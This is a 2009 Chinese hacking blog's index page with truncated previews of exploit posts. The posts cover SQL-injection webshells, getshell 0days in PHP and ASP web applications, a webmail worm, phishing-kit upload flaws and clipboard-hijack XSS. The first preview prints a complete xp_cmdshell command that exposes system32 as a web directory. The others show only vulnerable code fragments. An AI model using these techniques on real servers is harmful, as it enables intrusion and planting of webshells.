My5t3ry's 涂鸦板
百度空间 | 百度首页 
 
文章列表
 
得不到Web路径怎么处理
2009-11-06 18:45
from:http://laoxiege.blog.sohu.com/135941126.html
我们很多情况下都遇到SQL注入可以列目录和运行命 令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:

exec master.dbo.xp_cmdshell ’cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"’

建立虚拟目录win,指向c:\windows\system32

exec master.dbo.xp_cmdshell ’cscri
阅读全文>>
类别:默认分类 | 评论(0) | 浏览()
 
E-doo music get shell Vulnerability
2009-11-05 16:55
index.php line 10
  1. $data_name=get_date();  
  2.   
  3. ... ...  
  4.   
  5. $from=$_SERVER[
阅读全文>>
类别:0day&exp | 评论(0) | 浏览()
 
139邮箱蠕虫编写实例
2009-11-04 22:52
Author:[sh0wrun],[woyigui]
Date:2009-09-09
声明:该漏洞已报告并已修复,切勿用于非法目的。

阅读全文>>
类别:Scripts | 评论(0) | 浏览()
 
花马收信箱子Getshell 0day
2009-10-29 00:06
特征:login.asp能看到版权,不过有些箱子把这个地址改求了。另外主目录下存在一个wsidny.asp
整套程序过滤什么的灰常的严密,看得出来是专业的安全人士写的,唯一可以利用的地方就在这个wsidny.asp
看代码: 
<!-- #include file="conn.asp"-->

<% 

    Server.ScriptTimeout = 36000

   PostSize = Request.TotalBytes

if postsize=0 then

response.End()

end if

    BytesRead = 0        

     ReadSize=256
阅读全文>>
类别:0day&exp | 评论(1) | 浏览()
 
PunBB官方上传附件扩展注射漏洞
2009-10-28 19:04

by Ryat
http://www.wolvez.org
2009-10-24
本来想给论坛加个上传附件的功能,从官方网站下了个pun_attachment,顺便看了下代码,结果发现了这个漏洞:
{
if (preg_match('~(\d+)f(\d+)~', $_GET['secure_str'], $match))
{
...
'WHERE'        => 'a.id = '.$attach_item.' AND (fp.read_forum IS NULL OR fp.read_forum =

阅读全文>>
类别:0day&exp | 评论(0) | 浏览()
 
黑客渗透与防御的艺术
2009-10-25 22:13
http://book.syue.com/index.html
类别:默认分类 | 评论(0) | 浏览()
 
Dedecms select_soft_post.php页面变量未初始漏洞
2009-10-20 19:08
文/ Flyh4t

影响版本:Dedecms 5.5

漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶
过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关
的变量赋值。代码如下:

<html><head><title>Dedecms v55 RCE Exploit Codz By flyh4t</title></head>
<body style="FONT-SIZE: 9pt">---------- Dedecm
阅读全文>>
类别:0day&exp | 评论(0) | 浏览()
 
phpcms 2008 任意下载漏洞
2009-10-20 19:03
来自:影子鹰

漏洞文件download.php 


<?php
require dirname(__FILE__).'/include/common.inc.php';

$a_k = phpcms_auth($a_k, 'DECODE', AUTH_KEY);                                 //注意!!
if(empty($a_k)) showmessage($LANG['illegal_para
阅读全文>>
类别:0day&exp | 评论(0) | 浏览()
 
最新的游戏箱子收信程序上传漏洞利用方法
2009-10-11 10:40
来自:影子鹰

文章写得简洁一点,但是大家应该能看得懂!
存在这个漏洞的箱子程序还是挺多的!皇马,吉祥什么的好像都有!
首先看一下存在漏洞的具体文件代码,文件名称是GetGif.asp


[Copy to clipboard]CODE:
<!--#include file="config.asp"-->
<% 
Response.Buffer = True 
Server.ScriptTimeOut=180 
'On Error Resume
阅读全文>>
类别:默认分类 | 评论(0) | 浏览()
 
Javascript Paste Keyboard Shortcuts Hijack
2009-10-11 10:36
from:http://blog.csdn.net/kj021320/archive/2009/10/10/4651888.aspx

author : kj021320

team : I.S.T.O

这样的攻击手段也算是极其无耻 猥琐之极! 所以防御措施一定要做好

      首先说一下通过Javascript Paste Keyboard Shortcuts Hijack能做什么???能够读取你本地机器任何文件! 没错!也就是说 你中了任何一个XSS 加上你按了粘贴快捷键后,你就有可能被别人读取你机上任何的文件!

那到底是什么回事呢? OK 我慢慢来说

首先 我们知道JS是无权限获读取你

阅读全文>>
类别:默认分类 | 评论(0) | 浏览()
 
更多文章>>
     
 
 
文章分类
 
默认分类(25)
 
脚本渗透(11)
 
Scripts(6)
 
0day&exp(7)
 
     
 
最近访客
 
 

oxl6
pshpan

冷人冰心
相马茜Akanee

weijiangdai
gatosoft

hiphoph4ck
zhanganman
     
 
订阅我的空间
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     


©2009 Baidu